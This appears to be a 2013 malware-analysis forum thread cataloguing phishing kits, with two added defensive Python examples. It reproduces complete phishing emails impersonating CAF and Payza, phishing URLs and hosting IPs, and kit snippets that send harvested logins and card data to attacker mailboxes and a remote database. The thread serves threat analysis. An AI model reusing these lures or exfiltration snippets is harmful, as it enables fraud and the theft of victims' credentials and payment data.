A forum for reverse engineering, OS internals and malware analysis 
 #19940  by Xylitol
 Thu Jul 04, 2013 9:39 am
Received this morning.
https://www.phishtank.com/phish_detail. ... id=1918818
https://www.phishtank.com/phish_detail. ... id=1918826
Code:
x-store-info:8Rlnjmxvy6L6cXs23gz/9HW3P3dIQ3IM6IQxAzzR5HKM9ey9SkAB0zKAwdCSsiZDOMZKhPtQaQovUaElQov7pYd7qzZJ3BReMhc4rWGrLh+gTxWH/sS9o06nX5PyXsyw3A/vdhnP5Jg=
Authentication-Results: hotmail.com; spf=none (sender IP is 178.32.228.28) smtp.mailfrom=adambpww@ds5637.dreamservers.com; dkim=none header.d=credit-carte.fr; x-hmca=none header.id=service@credit-carte.fr
X-SID-PRA: service@credit-carte.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MTtHRD0yO1NDTD0w
X-Message-Info: rLItp1kDnk7oGAKcOgu6Oi6jsHwQ2WeImPvyBwthippkcj7ZoSELxAHk6o1Lxo+Fzo5O4/OPkNba7ZDtNUyH93QnUHrJLbQaW0Y4FrvfpYi0/EUV9QUekxpQDa9Mtle8yrh+EdI+frDsQGk5cpLBc73iE93ONdSP0jil9fIOQeA=
Received: from mo28.mail-out.ovh.net ([178.32.228.28]) by COL0-MC2-F18.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Wed, 3 Jul 2013 19:17:23 -0700
Received: from redirect.ovh.net (b3.ovh.net [213.186.33.53])
	by mo28.mail-out.ovh.net (Postfix) with SMTP id BDFE6FF887C
	for <*****@live.fr>; Thu,  4 Jul 2013 04:17:22 +0200 (CEST)
Received: from redirect.ovh.net (HELO queue) ()
	by redirect.ovh.net with SMTP; 4 Jul 2013 02:23:26 -0000
Received: from ds5637.dreamservers.com (67.205.22.155)
  by redirect.ovh.net with SMTP; 4 Jul 2013 02:23:26 -0000
Received: by ORT (Ovh Redirect Technology) ver:1.0
		< adambpww@ds5637.dreamservers.com
		> l5gqp8qfqmotd569k6d9@k.o-w-o.info >> *****@live.fr (found)
Received: by ds5637.dreamservers.com (Postfix, from userid 12985212)
	id 6A41C5C21E; Wed,  3 Jul 2013 19:15:12 -0700 (PDT)
To: l5gqp8qfqmotd569k6d9@k.o-w-o.info
Subject: Votre caisse d'allocation familiales
From: Caf.fr <service@credit-carte.fr>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="8ff7df6f4a3cae7ad8bb7ec0f49fa2e5"
Message-Id: <20130704021513.6A41C5C21E@ds5637.dreamservers.com>
Date: Wed,  3 Jul 2013 19:15:12 -0700 (PDT)
X-Ovh-Tracer-Id: 15897143735697427842
X-VR-SPAMSTATE: OK
X-VR-SPAMSCORE: 10
X-VR-SPAMCAUSE: gggruggvucftvghtrhhoucdtuddrfeeijedrtdduucetufdoteggodetrfcurfhrohhfihhlvgemucfqggfjnecuuegrihhlohhuthemuceftddtnecuogfpohfkffculddutddm
Return-Path: adambpww@ds5637.dreamservers.com
X-OriginalArrivalTime: 04 Jul 2013 02:17:23.0976 (UTC) FILETIME=[9EF8E880:01CE785C]

This is a multi-part message in MIME format.
--8ff7df6f4a3cae7ad8bb7ec0f49fa2e5
Content-type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 7bit

<HEAD>
<META content="MSHTML 6.00.6000.16640" name=GENERATOR></HEAD>
<BODY>
<DIV class=ReadMsgBody id=mpf0_readMsgBodyContainer onclick="return Control.invoke('MessagePartBody','_onBodyClick',event,event);">
<DIV class="SandboxScopeClass ExternalClass" id=mpf0_MsgContainer>
<TABLE style="WORD-SPACING: 0px; FONT: 13px/17px Tahoma, Verdana, Arial, sans-serif; TEXT-TRANSFORM: none; COLOR: rgb(42,42,42); TEXT-INDENT: 0px; WHITE-SPACE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); WIDOWS: 2; ORPHANS: 2" cellSpacing=0 cellPadding=0 width=578 align=center border=0>
<TBODY style="LINE-HEIGHT: 17px">
<TR style="LINE-HEIGHT: 17px">
<TD style="LINE-HEIGHT: 17px" align=middle width=578 height=30><FONT style="FONT-SIZE: 9px; LINE-HEIGHT: normal" face="Arial, sans-serif" color=#000000 size=1></FONT></TD></TR></TBODY></TABLE>
<TABLE style="BORDER-RIGHT: rgb(0,80,177) 1px solid; BORDER-TOP: rgb(0,80,177) 1px solid; WORD-SPACING: 0px; FONT: 13px/17px Tahoma, Verdana, Arial, sans-serif; TEXT-TRANSFORM: none; BORDER-LEFT: rgb(0,80,177) 1px solid; COLOR: rgb(42,42,42); TEXT-INDENT: 0px; BORDER-BOTTOM: rgb(0,80,177) 1px solid; WHITE-SPACE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); WIDOWS: 2; ORPHANS: 2" cellSpacing=0 cellPadding=0 width=580 align=center border=0>
<TBODY style="LINE-HEIGHT: 17px">
<TR style="LINE-HEIGHT: 17px">
<TD style="LINE-HEIGHT: 17px" vAlign=top width=133 bgColor=#ffffff>
<TABLE style="LINE-HEIGHT: 17px" cellSpacing=0 cellPadding=0 width=133 border=0>
<TBODY style="LINE-HEIGHT: 17px">
<TR style="LINE-HEIGHT: 17px">
<TD style="LINE-HEIGHT: 17px" vAlign=top width=26> </TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=79><IMG alt="ALLOCATIONS FAMILIALES" hspace=0 src="http://www.oldoaksjournal.com/ImageProxyy.PNG" border=0></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=28> </TD></TR></TBODY></TABLE></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=445>
<TABLE style="LINE-HEIGHT: 17px" cellSpacing=0 cellPadding=0 width=445 border=0>
<TBODY style="LINE-HEIGHT: 17px">
<TR style="LINE-HEIGHT: 17px" bgColor=#0050b1>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=50 height=80> </TD>
<TD style="LINE-HEIGHT: 17px" colSpan=2 height=80><FONT style="FONT-SIZE: 22px; LINE-HEIGHT: normal" face="Arial, Helvetica, sans-serif" color=#ffffff size=4>Votre Caf vous informe sur :<SPAN class=ecxApple-converted-space> </SPAN><BR style="LINE-HEIGHT: 28px">vos </FONT><FONT style="FONT-SIZE: 22px; LINE-HEIGHT: normal" face="Arial, Helvetica, sans-serif" color=#ffffff size=4>remboursements</FONT></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=10 height=80> </TD></TR>
<TR style="LINE-HEIGHT: 17px" bgColor=#0050b1>
<TD style="LINE-HEIGHT: 17px" vAlign=top><IMG style="LINE-HEIGHT: 17px" height=1 src="https://bay169.mail.live.com/Handlers/ImageProxy.mvc?bicild=&canary=qHLfzMG4u5yGnRcCIfKGE2YjbBwsrbAy5xl4a31nbjI%3d0&url=http%3a%2f%2fwebe.emv3.com%2fcnaf_%2f20120822%2fDTR-RSA-Relance-ECARRT2%2fimages%2fspacer.gif" width=50 border=0></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top><IMG style="LINE-HEIGHT: 17px" height=1 src="https://bay169.mail.live.com/Handlers/ImageProxy.mvc?bicild=&canary=qHLfzMG4u5yGnRcCIfKGE2YjbBwsrbAy5xl4a31nbjI%3d0&url=http%3a%2f%2fwebe.emv3.com%2fcnaf_%2f20120822%2fDTR-RSA-Relance-ECARRT2%2fimages%2fspacer.gif" width=317 border=0></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=68><IMG style="LINE-HEIGHT: 17px" height=1 src="https://bay169.mail.live.com/Handlers/ImageProxy.mvc?bicild=&canary=qHLfzMG4u5yGnRcCIfKGE2YjbBwsrbAy5xl4a31nbjI%3d0&url=http%3a%2f%2fwebe.emv3.com%2fcnaf_%2f20120822%2fDTR-RSA-Relance-ECARRT2%2fimages%2fspacer.gif" width=68 border=0></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top><IMG style="LINE-HEIGHT: 17px" height=1 src="https://bay169.mail.live.com/Handlers/ImageProxy.mvc?bicild=&canary=qHLfzMG4u5yGnRcCIfKGE2YjbBwsrbAy5xl4a31nbjI%3d0&url=http%3a%2f%2fwebe.emv3.com%2fcnaf_%2f20120822%2fDTR-RSA-Relance-ECARRT2%2fimages%2fspacer.gif" width=10 border=0></TD></TR>
<TR style="LINE-HEIGHT: 17px" bgColor=#ffffff>
<TD style="LINE-HEIGHT: 17px" vAlign=top><IMG alt="" hspace=0 src="http://www.oldoaksjournal.com/ImageProxyn.PNG" border=0></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=317 height=49> </TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top colSpan=2><IMG alt=caf.fr hspace=0 src="http://www.oldoaksjournal.com/ImageProxyt.PNG" border=0></TD></TR></TBODY></TABLE></TD></TR>
<TR style="LINE-HEIGHT: 17px">
<TD style="LINE-HEIGHT: 17px" vAlign=top bgColor=#0050b1><IMG alt="" hspace=0 src="http://www.oldoaksjournal.com/ImageProxy.PNG" border=0></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top>
<TABLE style="LINE-HEIGHT: 17px" cellSpacing=0 cellPadding=0 width=445 border=0>
<TBODY style="LINE-HEIGHT: 17px">
<TR style="LINE-HEIGHT: 17px" bgColor=#ffffff>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=44 height=415> </TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=393 height=415><FONT style="FONT-SIZE: 12px; LINE-HEIGHT: normal" face="Arial, Helvetica, sans-serif" color=#323232 size=1><BR style="LINE-HEIGHT: 15px"></FONT><FONT style="FONT-WEIGHT: bold; LINE-HEIGHT: normal" face="Arial, Helvetica, sans-serif" color=#323232><SPAN>Madame, Monsieur, <BR style="LINE-HEIGHT: 15px"></SPAN></FONT><FONT style="FONT-SIZE: 12px; LINE-HEIGHT: normal" face="Arial, Helvetica, sans-serif" color=#323232 size=1><BR style="LINE-HEIGHT: 15px"></FONT>Après les derniers calculs annuels de l'exercice de votre activité, 
<P style="FONT-WEIGHT: normal; MARGIN: 10px 0px 0px; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(51,51,51); TEXT-INDENT: 0px; LINE-HEIGHT: 200%; FONT-STYLE: normal; FONT-FAMILY: Times New Roman; WHITE-SPACE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-ALIGN: left; FONT-VARIANT: normal; WIDOWS: 2; ORPHANS: 2">nous avons déterminé que vous êtes admissible a recevoir un remboursement de notre part d'un montant de 217,50 €</P>
<P style="FONT-WEIGHT: normal; MARGIN: 10px 0px 0px; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(51,51,51); TEXT-INDENT: 0px; LINE-HEIGHT: 200%; FONT-STYLE: normal; FONT-FAMILY: Times New Roman; WHITE-SPACE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-ALIGN: left; FONT-VARIANT: normal; WIDOWS: 2; ORPHANS: 2">Prière de soumettre votre demande de remboursement et nous permettre de 2 jours ouvrables pour le traitement de votre situation,</P>
<P style="FONT-WEIGHT: normal; MARGIN: 10px 0px 0px; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(51,51,51); TEXT-INDENT: 0px; LINE-HEIGHT: 200%; FONT-STYLE: normal; FONT-FAMILY: Times New Roman; WHITE-SPACE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-ALIGN: left; FONT-VARIANT: normal; WIDOWS: 2; ORPHANS: 2">Pour accéder au formulaire de votre Compte , <A href="
http://klassofficeangels.co.uk/wp-admin/images/caf.fr/Caisse-allocations-familiales/" target=_blank><FONT color=#808000>Veuillez cliquez ici</FONT></A></P>
<P style="TEXT-ALIGN: left">A bientôt  sur Caf.fr </P>
<P style="TEXT-ALIGN: left">Votre caisse d'allocation familiales </P>
<P> </P></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=8 height=415> </TD></TR>
<TR style="LINE-HEIGHT: 17px" bgColor=#ffffff>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=8> </TD></TR></TBODY></TABLE></TD></TR>
<TR style="LINE-HEIGHT: 17px" bgColor=#0050b1>
<TD style="LINE-HEIGHT: 17px" align=middle colSpan=2 height=90><FONT style="FONT-SIZE: 11px; LINE-HEIGHT: normal" face="Arial, Helvetica, sans-serif" color=#ffffff size=4><FONT style="FONT-WEIGHT: 700; LINE-HEIGHT: normal; TEXT-DECORATION: underline" color=#ffffff>Mentions légales</FONT><BR style="LINE-HEIGHT: 14px"><BR style="LINE-HEIGHT: 14px">Vous recevez ce message car vous nous avez communiqué votre adresse électronique..<SPAN class=ecxApple-converted-space> </SPAN><BR style="LINE-HEIGHT: 14px">Si vous ne souhaitez plus recevoir de courriel de votre Caf, veuillez effacer votre adresse e-mail<SPAN class=ecxApple-converted-space> </SPAN><BR style="LINE-HEIGHT: 14px">dans l'espace "Mon Compte" du site<SPAN class=ecxApple-converted-space> </SPAN><A title=www.caf.fr style="CURSOR: pointer; COLOR: rgb(255,255,255); LINE-HEIGHT: 14px; TEXT-DECORATION: underline" href="http://courriel.caf.fr/HS?a=ENX7CqqdlqtK8SA9MKJVCxLnGHxKLrfxUPcStGb5lw8W0bBhOG5mpqVsje_Hhe-uL1IR" target=_blank
 ><FONT style="LINE-HEIGHT: normal" color=#ffffff>www.caf.fr</FONT></A></FONT></TD></TR></TBODY></TABLE><IMG style="WORD-SPACING: 0px; FONT: 13px/17px Tahoma, Verdana, Arial, sans-serif; TEXT-TRANSFORM: none; COLOR: rgb(42,42,42); TEXT-INDENT: 0px; WHITE-SPACE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); WIDOWS: 2; ORPHANS: 2" height=1 alt="" src="https://bay169.mail.live.com/Handlers/ImageProxy.mvc?bicild=&canary=qHLfzMG4u5yGnRcCIfKGE2YjbBwsrbAy5xl4a31nbjI%3d0&url=http%3a%2f%2fcourriel.caf.fr%2fHO%3fDdX7CqqdlqtK8SA9MOPQKPbnGHxKLIcjIgjtS5kGfgDiKKY.gif" width=1 border=0> </DIV></DIV></BODY>

Code:
$headers = "From: ReZzZulT caf <thomasjulien10@googlemail.com>";
Code:
$send = "thomasjulien10@googlemail.com";
Attachments
infected
(561.18 KiB) Downloaded 56 times
 #20657  by Xylitol
 Fri Aug 30, 2013 10:42 pm
Postbank phishing, thanks to markusg for the link.
http://www.phishtank.com/phish_detail.p ... id=2000306
Fun, they use urlrewrite:
Code:
RewriteEngine On

RewriteRule ^([A-Za-z0-9-]+).postbank.de/rai/login$ ./p.html [L,QSA]
Attachments
infected
(8.76 KiB) Downloaded 54 times
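Added example (not part of the original post or the kit): what the RewriteRule quoted in the post above matches, plus a URL check that flags a brand hostname sitting in the path instead of the host. It assumes the rule is in a per-directory .htaccess, where mod_rewrite matches the path relative to that directory; the sample URLs, the `BRAND_HOSTS` list and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Pattern copied from the RewriteRule in the post. The dots are unescaped,
# so each one matches any single character, not only a literal ".".
KIT_RULE = re.compile(r"^([A-Za-z0-9-]+).postbank.de/rai/login$")

# Assumption: brands to watch for. Only postbank.de comes from the post.
BRAND_HOSTS = ("postbank.de",)

# Constructed sample URLs (hosts and the "banking" label are made up).
SAMPLES = (
    "http://compromised.example/banking.postbank.de/rai/login",
    "https://banking.postbank.de/rai/login",
    "http://compromised.example/blog/2013/08/post.html",
)


def kit_rule_matches(rel_path):
    """True if the kit's rule would serve p.html for this per-directory path."""
    return KIT_RULE.match(rel_path) is not None


def brand_in_path(url, brands=BRAND_HOSTS):
    """Return the brand host found in the URL path when the real host is not
    on that brand's domain, otherwise None."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    for brand in brands:
        if host == brand or host.endswith("." + brand):
            continue  # the request really goes to the brand's domain
        for segment in parts.path.lower().split("/"):
            if segment == brand or segment.endswith("." + brand):
                return brand
    return None


if __name__ == "__main__":
    for url in SAMPLES:
        rel = urlsplit(url).path.lstrip("/")
        print(url, "| kit rule:", kit_rule_matches(rel),
              "| brand in path:", brand_in_path(url))
```

The rewritten path makes the address bar show a string that reads like the bank's hostname and login path, while the host in front of it is unrelated, which is what `brand_in_path` keys on.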
 #20689  by Xylitol
 Mon Sep 02, 2013 12:46 pm
Payza phishing
https://www.phishtank.com/phish_detail. ... id=2008243
Code:
x-store-info:4r51+eLowCe79NzwdU2kR3P+ctWZsO+J
Authentication-Results: hotmail.com; spf=none (sender IP is 72.20.57.159) smtp.mailfrom=stabletr@server.stabletreasure.com; dkim=none header.d=payza.com; x-hmca=none header.id=noreply@payza.com
X-SID-PRA: noreply@payza.com
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: s1:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: 11chDOWqoTkSkfQf0VM3EjGNlYZMOiUHTp8SGYn1b7ZZ4Laa+ZyyskqPPuyzpXoWhBOaRQyEr49tG2ATE4erdx0lpt8h5FV3PbCAEfANqq69iCxXZL6ylgOCcCDq23caW2SLNLcHxzBxOg1Hmfy1l7++7gnt/mzDJGUrpL5poVDMK0EWKO0TBs2sEhDfw5CyFfx8B0bENEmeYEl55raGwp7CW7tAqGvx
Received: from server.stabletreasure.com ([72.20.57.159]) by COL0-MC3-F7.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Mon, 2 Sep 2013 04:11:02 -0700
Received: from stabletr by server.stabletreasure.com with local (Exim 4.80.1)
	(envelope-from <stabletr@server.stabletreasure.com>)
	id 1VGS29-0003lT-IL
	for ****************@live.fr; Mon, 02 Sep 2013 04:11:01 -0700
To: ****************@live.fr
Subject: Payza: Money Received
X-PHP-Script: stabletreasure.com/perfect.php for 198.7.58.98
From: Payza <noreply@payza.com>
MIME-Version: 1.0
Content-Type: text/html
Message-Id: <E1VGS29-0003lT-IL@server.stabletreasure.com>
Date: Mon, 02 Sep 2013 04:11:01 -0700
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server.stabletreasure.com
X-AntiAbuse: Original Domain - live.fr
X-AntiAbuse: Originator/Caller UID/GID - [500 501] / [47 12]
X-AntiAbuse: Sender Address Domain - server.stabletreasure.com
X-Get-Message-Sender-Via: server.stabletreasure.com: authenticated_id: stabletr/only user confirmed/virtual account not confirmed
Return-Path: stabletr@server.stabletreasure.com
X-OriginalArrivalTime: 02 Sep 2013 11:11:02.0762 (UTC) FILETIME=[1C70ECA0:01CEA7CD]

<html><head xmlns="http://www.w3.org/1999/xhtml"><meta http-equiv="X-UA-Compatible" content="IE=7"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link type="text/css" rel="stylesheet" href="http://199.116.250.88:2095/cpsess555206985/3rdparty/roundcube/program/js/tiny_mce/themes/advanced/skins/default/content.css"><link type="text/css" rel="stylesheet" href="http://199.116.250.88:2095/cpsess555206985/3rdparty/roundcube/skins/classic/editor_content.css"></head><body style="font-family: Verdana,Geneva,sans-serif;" dir="ltr" id="tinymce" class="mceContentBody " onload="window.parent.tinyMCE.get('compose-body').onLoad.dispatch();" contenteditable="true"><p id="yui_3_7_2_35_1374163412280_54"> </p><div id="yui_3_7_2_35_1374163412280_59" class="yui_3_7_2_35_1374163412280_58" style="font-family: times new roman, new york, times, serif; font-size: 12pt;" data-mce-style="font-family: times new roman, new york, times, serif; font-size: 12pt;"><div id="yui_3_7_2_35_1374163412280_88" class="yui_3_7_2_35_1374163412280_66" style="font-family: times new roman, new york, times, serif; font-size: 12pt;" data-mce-style="font-family: times new roman, new york, times, serif; font-size: 12pt;"><div id="yui_3_7_2_35_1374163412280_249" class="y_msg_container"><br><div id="yiv9698155111"><table class="mceItemTable" id="yui_3_7_2_35_1374163412280_248" style="width: 606px; height: 614px;" data-mce-style="width: 606px; height: 614px;" align="center" border="0" cellpadding="0" cellspacing="0"><tbody id="yui_3_7_2_35_1374163412280_247"><tr id="yui_3_7_2_35_1374163412280_246"><td id="yui_3_7_2_35_1374163412280_245" valign="bottom"><span class="yui_3_7_2_35_1374163412280_72" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 12px; color: #9f9f9f;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 12px; color: #9f9f9f;"> This is an automated email, please do not reply</span></td><td align="right"><img 
src="http://www.m5zn.com/image.php?img=14896452.png" alt="" data-mce-src="http://www.m5zn.com/image.php?img=14896452.png" border="0" height="52" width="182"></td></tr><tr><td colspan="2" height="14" valign="bottom"><img src="http://intradenetwork.com/components/com_banners/url.htm" alt="" data-mce-src="http://intradenetwork.com/components/com_banners/url.htm" height="3" width="100%"></td></tr><tr id="yui_3_7_2_35_1374163412280_264"><td id="yui_3_7_2_35_1374163412280_263" colspan="2"><h1 id="yui_3_7_2_35_1374163412280_262" class="yui_3_7_2_35_1374163412280_73" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #66aa1e; font-weight: normal; font-size: 24px; padding: 10px 0px 0px 0px;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #66aa1e; font-weight: normal; font-size: 24px; padding: 10px 0px 0px 0px;">Your Account Limited Please Verify Your Identity</h1><p id="yui_3_7_2_35_1374163412280_270" class="yui_3_7_2_35_1374163412280_62" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #7ebd41; font-weight: normal; font-size: 19px; padding: 0px 0px 0px 0px; line-height: 24px;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #7ebd41; font-weight: normal; font-size: 19px; padding: 0px 0px 0px 0px; line-height: 24px;">You've got cash! 
But Need Update Your Info To Accept Payment</p><h2 class="yui_3_7_2_35_1374163412280_74" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #f79422; font-size: 19px; border-top: 1px solid #efefef; padding: 10px 0px 0px 0px;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #f79422; font-size: 19px; border-top: 1px solid #efefef; padding: 10px 0px 0px 0px;">Payment Details</h2><ul id="yui_3_7_2_35_1374163412280_85" class="yui_3_7_2_35_1374163412280_76" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px; color: #545454; list-style-type: none;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px; color: #545454; list-style-type: none;"><li>Date: July 18, 2013 7:44:01 AM</li><li id="yui_3_7_2_35_1374163412280_273">Amount Received $250.00 USD</li><li id="yui_3_7_2_35_1374163412280_275">Reference Number: 4D019-1880F-E5509</li><li></li><li>Note : You Account Limited And Money Not Add</li><li><strong><a href="http://dineinhell.com/1" data-mce-href="http://dineinhell.com/1">Verify Your Identity By Clicking On This Link or By Click The One Below</a></strong></li><li>Or Click In Next URL</li><li><strong> <a href="http://dineinhell.com/1" target="_blank" data-mce-href="http://dineinhell.com/1">https://secure.payza.com/P.aspx?c=X18O74LDCBX7</a></strong><br data-mce-bogus="1"></li><li>2. Verify Your Identity  . 
Will Update Your Account And Add The Hold Money</li></ul><p class="yui_3_7_2_35_1374163412280_63" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px; color: #545454;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px; color: #545454;">View the details of this transaction by logging into your Payza account.</p></td></tr><tr><td colspan="2"><div style="float: right; width: 123px; min-height: 20px;" data-mce-style="float: right; width: 123px; min-height: 20px;"><div style="float: right;" data-mce-style="float: right;"><span class="yui_3_7_2_35_1374163412280_79" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #36c; font-size: 15px;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #36c; font-size: 15px;"> Follow Us </span> <img src="http://www.m5zn.com/newuploads/2013/09/02/png//m5zn_ac58ec5c13682fe.png" alt="on our Blog" data-mce-src="http://www.m5zn.com/newuploads/2013/09/02/png//m5zn_ac58ec5c13682fe.png" border="0" height="16" width="16"> <img src="http://www.m5zn.com/newuploads/2013/09/02/png//m5zn_1a07df47ee559fa.png" alt="on Facebook" data-mce-src="http://www.m5zn.com/newuploads/2013/09/02/png//m5zn_1a07df47ee559fa.png" border="0" height="16" width="16"> <img src="http://www.m5zn.com/newuploads/2013/09/02/png//m5zn_30215a28449bab8.png" alt="on Twitter" data-mce-src="http://www.m5zn.com/newuploads/2013/09/02/png//m5zn_30215a28449bab8.png" border="0" height="16" width="16"></div></div><span class="yui_3_7_2_35_1374163412280_80" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 17px; color: #66aa1e;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 17px; color: #66aa1e;"> Thanks for choosing Payza, </span><br> <span class="yui_3_7_2_35_1374163412280_81" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #66aa1e; 
font-size: 15px;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #66aa1e; font-size: 15px;"> The Payza Team</span></td></tr><tr><td colspan="2" height="14" valign="bottom"><img src="http://intradenetwork.com/components/com_banners/url.htm" alt="" data-mce-src="http://intradenetwork.com/components/com_banners/url.htm" height="3" width="100%"></td></tr><tr><td colspan="2"><p class="yui_3_7_2_35_1374163412280_64" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 12px; color: #545454; padding: 10px 0px 0px 0px;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 12px; color: #545454; padding: 10px 0px 0px 0px;"><span class="yui_3_7_2_35_1374163412280_82" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 14px; font-weight: bold;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 14px; font-weight: bold;"> Need Assistance?</span><br> We're happy to help by phone Monday to Friday 8:00 a.m. to 11:59 p.m. EST, or by email<br> Copyright 2013 Payza. All rights reserved.</p><p class="yui_3_7_2_35_1374163412280_65" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 11px; color: #66aa1e;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 11px; color: #66aa1e;">Email ID: 0049</p></td></tr></tbody></table></div></div></div></div></body></html>
Code:
$send ="willskathlin1@gmail.com,piyushpatdiya1@gmail.com"; # [Your Email Here] 
Mailers:
Code:
stabletreasure.com/mail.php
stabletreasure.com/perfect.php
yourownprogrammer.com/mizos-mailer3.php
yourownprogrammer.com/ok.php
Skrill:
http://www.phishtank.com/phish_detail.p ... id=2008286
Code:
$send ="forexbank459@gmail.com,securty_y@yahoo.com"; # [Your Email Here] 
Yahoo:
Code:
$recipient = "thereviewcomittee2010@gmail.com";
Attachments
infected
(1.03 MiB) Downloaded 65 times
infected
(1.7 MiB) Downloaded 63 times
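Added example (not part of the original post): a header triage over a subset of the Payza message headers quoted in the post above, checking the SPF/DKIM verdicts, whether the visible From domain lines up with the envelope sender, and whether an X-PHP-Script header names a sending script. The function names and the alignment rule (a rough approximation without a public-suffix list) are assumptions made for this example.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Subset of the Payza message headers quoted in the post above.
SAMPLE = """\
Authentication-Results: hotmail.com; spf=none (sender IP is 72.20.57.159) smtp.mailfrom=stabletr@server.stabletreasure.com; dkim=none header.d=payza.com; x-hmca=none header.id=noreply@payza.com
Subject: Payza: Money Received
X-PHP-Script: stabletreasure.com/perfect.php for 198.7.58.98
From: Payza <noreply@payza.com>
Return-Path: stabletr@server.stabletreasure.com

"""


def domain(addr):
    """Lower-cased domain part of an address header value ('' if none)."""
    return parseaddr(addr)[1].rpartition("@")[2].lower()


def aligned(a, b):
    """Rough relaxed alignment: same domain, or one is a subdomain of the other.
    Assumption: no public-suffix list is consulted, so this is approximate."""
    return bool(a and b) and (a == b or a.endswith("." + b) or b.endswith("." + a))


def triage(raw):
    """Collect the header facts an analyst would check first."""
    msg = message_from_string(raw)
    auth = msg.get("Authentication-Results", "")
    out = {}
    for mech in ("spf", "dkim"):
        m = re.search(rf"\b{mech}=(\w+)", auth)
        out[mech] = m.group(1).lower() if m else "missing"
    out["from_domain"] = domain(msg.get("From", ""))
    out["envelope_domain"] = domain(msg.get("Return-Path", ""))
    out["aligned"] = aligned(out["from_domain"], out["envelope_domain"])
    # Value format as seen in the post: "<host>/<script> for <address>".
    script = re.match(r"\s*(\S+) for (\S+)", msg.get("X-PHP-Script", ""))
    out["php_script"] = script.group(1) if script else None
    out["suspicious"] = (not out["aligned"]
                         and out["spf"] != "pass" and out["dkim"] != "pass")
    return out


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```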
 #20790  by Blaze
 Thu Sep 12, 2013 1:07 pm
SNS bank & ICS (Visa/Mastercard) phishing.
Code:
http://216.59.22.125/~best/
http://216.59.22.184/~best/
http://67.23.163.29/~komer/
Attachments
(169.57 KiB) Downloaded 62 times
 #21693  by Xylitol
 Sun Dec 15, 2013 7:10 pm
German PayPal
https://www.phishtank.com/phish_detail. ... id=2172040
Code:
    $string = base64_decode($_POST['secure'])."|".$_POST['ccnr']."|".$_POST['kpn']."|".$_POST['gulm']."/".$_POST['guly']."|".$_POST['ktn']."|".$_POST['limit'];
     mysql_connect("192.154.110.252", "0x82x91x32x23x29", "0x82x91x32x23x29");
